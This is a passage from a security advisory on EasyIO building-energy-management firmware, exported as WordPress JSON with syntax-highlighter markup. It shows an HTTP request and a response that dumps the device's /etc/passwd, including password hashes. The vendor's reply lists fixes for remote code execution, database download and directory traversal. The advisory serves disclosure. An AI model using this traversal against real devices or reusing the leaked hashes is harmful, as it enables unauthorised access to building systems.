class=\"crayon-cn\">6.1<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">WOW64<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">AppleWebKit<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">537.36<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">KHTML<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">like <\/span><span class=\"crayon-v\">Gecko<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Chrome<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">49.0.2623.75<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Safari<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">537.36<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c078469555230-6\"><span class=\"crayon-v\">Referer<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">http<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-c\">\/\/192.168.0.16\/sdcard\/cpt\/app\/graphic.php?grname=Admin.gr<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c078469555230-7\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Encoding<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">gzip<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">deflate<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">sdch<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c078469555230-8\"><span class=\"crayon-v\">Accept<\/span><span class=\"crayon-o\">&#8211;<\/span><span 
class=\"crayon-v\">Language<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">US<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">en<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-v\">q<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0.8<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c078469555230-9\"><span class=\"crayon-v\">Cookie<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">PHPSESSID<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">7384531ce6f444710b42106a07b91e4c<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">PHPSESSID<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">7384531ce6f444710b42106a07b91e4c<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c078469555230-10\"><span class=\"crayon-v\">Connection<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">close<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0027 seconds] -->  <\/p>\n<p>Will receive from the server the following response:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-58867eb52c07a306585545\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div 
class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> HTTP\/1.1 200 OK  Date: Mon, 07 Mar 2016 03:21:24 GMT  Server: Embedthis-Appweb\/3.3.2  Content-Length: 390  Content-Type: text\/html  Connection: close  Pragma: no-cache  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0  Last-Modified: Mon, 07 Mar 2016 03:21:24 GMT  Content-type: text\/html  X-Powered-By: PHP\/5.3.10  Expires: Thu, 19 Nov 1981 08:52:00 GMT    {&#8220;data&#8221;: &#8220;root:r2PJOcraF5UZg:0:0:root:\/:\/bin\/sh  bin:*:1:1:bin:\/bin:  daemon:*:2:2:daemon:\/sbin:  nobody:*:99:99:Nobody:\/:  admin:tBVL4DWVHEbys:500:500:admin:\/:\/bin\/sh  sdcard:uu7RndQCc\/s.Q:501:501:sdcard:\/sdcard:\/bin\/sh  guest:1hK129p3FfneE:502:502:guest:\/mnt\/users\/guest:\/bin\/sh  
webuser:xLhgTub5K6Css:503:503:webuser:\/mnt\/appweb\/web\/:\/bin\/sh  &#8220;,&#8221;actionPermitted&#8221;: &#8220;true&#8221;,&#8221;home_page&#8221;: &#8220;&#8221;}<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c07a306585545-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c07a306585545-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c07a306585545-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c07a306585545-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c07a306585545-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c07a306585545-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c07a306585545-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c07a306585545-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c07a306585545-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c07a306585545-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c07a306585545-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c07a306585545-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c07a306585545-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c07a306585545-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c07a306585545-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c07a306585545-16\">16<\/div>\n<div class=\"crayon-num\" 
data-line=\"crayon-58867eb52c07a306585545-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c07a306585545-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c07a306585545-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c07a306585545-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-58867eb52c07a306585545-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-58867eb52c07a306585545-22\">22<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-58867eb52c07a306585545-1\"><span class=\"crayon-v\">HTTP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">1.1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">200<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">OK<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c07a306585545-2\"><span class=\"crayon-v\">Date<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Mon<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">07<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">Mar<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2016<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">03<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">24<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">GMT<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c07a306585545-3\"><span class=\"crayon-v\">Server<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> 
<\/span><span class=\"crayon-v\">Embedthis<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Appweb<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">3.3.2<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c07a306585545-4\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Length<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">390<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c07a306585545-5\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Type<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-e\">html<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c07a306585545-6\"><span class=\"crayon-v\">Connection<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">close<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c07a306585545-7\"><span class=\"crayon-v\">Pragma<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">no<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-e\">cache<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c07a306585545-8\"><span class=\"crayon-v\">Cache<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Control<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">no<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">store<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">no<\/span><span class=\"crayon-o\">&#8211;<\/span><span 
class=\"crayon-v\">cache<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">must<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">revalidate<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">post<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">check<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">pre<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">check<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-cn\">0<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c07a306585545-9\"><span class=\"crayon-v\">Last<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Modified<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Mon<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">07<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">Mar<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">2016<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">03<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">21<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">24<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">GMT<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c07a306585545-10\"><span class=\"crayon-v\">Content<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">text<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-i\">html<\/span><\/div>\n<div class=\"crayon-line\" 
id=\"crayon-58867eb52c07a306585545-11\"><span class=\"crayon-v\">X<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">Powered<\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-v\">By<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">PHP<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-cn\">5.3.10<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c07a306585545-12\"><span class=\"crayon-v\">Expires<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">Thu<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">19<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">Nov<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1981<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">08<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">52<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-cn\">00<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">GMT<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c07a306585545-13\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c07a306585545-14\"><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8220;data&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;root:r2PJOcraF5UZg:0:0:root:\/:\/bin\/sh<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c07a306585545-15\"><span class=\"crayon-s\">bin:*:1:1:bin:\/bin:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c07a306585545-16\"><span class=\"crayon-s\">daemon:*:2:2:daemon:\/sbin:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c07a306585545-17\"><span 
class=\"crayon-s\">nobody:*:99:99:Nobody:\/:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c07a306585545-18\"><span class=\"crayon-s\">admin:tBVL4DWVHEbys:500:500:admin:\/:\/bin\/sh<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c07a306585545-19\"><span class=\"crayon-s\">sdcard:uu7RndQCc\/s.Q:501:501:sdcard:\/sdcard:\/bin\/sh<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c07a306585545-20\"><span class=\"crayon-s\">guest:1hK129p3FfneE:502:502:guest:\/mnt\/users\/guest:\/bin\/sh<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58867eb52c07a306585545-21\"><span class=\"crayon-s\">webuser:xLhgTub5K6Css:503:503:webuser:\/mnt\/appweb\/web\/:\/bin\/sh<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58867eb52c07a306585545-22\"><span class=\"crayon-s\">&#8220;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;actionPermitted&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;true&#8221;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-s\">&#8220;home_page&#8221;<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8220;&#8221;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p><strong><u>Vendor Response<\/u><\/strong><br \/> <u>Unauthenticated remote code execution<\/u> &#8211; This reported issue has been fixed in this week&#8217;s release (CPT tool, dated 11th Nov 2016). We have also fixed all possible code that can cause this issue. <\/p>\n<p><u>Unauthenticated database file download<\/u> &#8211; This had been fixed in a previous version of FG firmware; we introduced an appweb configuration to fix this issue in around Feb, 2015. 
You can test this with our latest firmware or you could send this note to the person who reported this.<\/p>\n<p><u>Authenticated directory traversal vulnerability <\/u>&#8211; This has been fixed in this week&#8217;s release(CPT tool , dated 11th Nov 2016). I also fixed all possible codes that can cause this issue. <\/p>\n<\/p><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/2908\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Vulnerability Summary The following advisory describes three (3) vulnerabilities that allow to an attacker to gain unauthenticated remote code execution. EasyIO provides products for Building Energy Management Systems. Low costs, high energy savings. The three vulnerabilities found in EasyIO include: Unauthenticated remote code execution Unauthenticated database file download Authenticated directory traversal vulnerability The vulnerability affected &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/2908\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory &#8211; EasyIO Multiple Vulnerabilities<\/span> <span 
class=\"meta-nav\">&#8594;<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[10757],"class_list":["post-6272","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/6272","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=6272"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/6272\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=6272"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=6272"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=6272"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
